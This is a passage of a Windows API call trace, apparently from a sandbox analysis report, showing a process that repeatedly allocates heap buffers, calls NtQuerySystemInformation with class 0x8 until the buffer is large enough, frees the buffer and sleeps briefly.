RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.688] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.689] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.693] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.694] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.694] Sleep (dwMilliseconds=0x110) [0221.701] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.701] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.702] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.702] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.702] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.703] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.703] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.703] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.704] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.704] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.704] Sleep (dwMilliseconds=0x110) [0221.717] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.717] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.718] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.718] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.718] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.719] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.719] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.719] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.720] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.720] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.720] Sleep (dwMilliseconds=0x110) [0221.731] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.732] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.733] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.733] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.733] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.738] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.738] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.739] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.739] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.739] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.740] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.740] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.740] Sleep (dwMilliseconds=0x110) [0221.767] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.767] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.767] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.772] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.772] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.772] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.773] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.773] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.773] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.773] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.774] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.774] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.774] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.774] Sleep (dwMilliseconds=0x110) [0221.782] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.782] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.783] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.783] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.783] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.784] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.784] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.784] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.785] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.786] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.786] Sleep (dwMilliseconds=0x110) [0221.798] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.798] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.798] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.799] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.799] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.799] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.800] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.800] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.800] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.800] Sleep (dwMilliseconds=0x110) [0221.811] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.811] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.812] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.812] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.812] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.813] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.813] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.813] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.814] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.814] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.814] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.815] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.815] Sleep (dwMilliseconds=0x110) [0221.827] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.827] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.827] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.831] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.831] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.832] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.832] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.832] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.833] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.833] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.833] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.834] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.834] Sleep (dwMilliseconds=0x110) [0221.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.843] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.843] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.843] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.844] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.844] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.845] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.845] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.845] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.846] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.846] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.847] Sleep (dwMilliseconds=0x110) [0221.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.858] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.858] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.859] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.859] Sleep (dwMilliseconds=0x110) [0221.878] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.878] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.879] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.879] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.879] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.880] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.880] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.880] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.880] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.881] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.881] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.881] Sleep (dwMilliseconds=0x110) [0221.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.888] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.888] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.888] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.892] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.893] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.893] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.893] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.894] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.894] Sleep (dwMilliseconds=0x110) [0221.908] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.908] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.908] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.909] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.909] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.909] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0221.910] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0221.910] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.910] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0221.911] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.911] Sleep (dwMilliseconds=0x110) [0221.923] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0221.923] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.924] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.924] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0221.924] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0221.925] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0221.925] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0221.925] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, 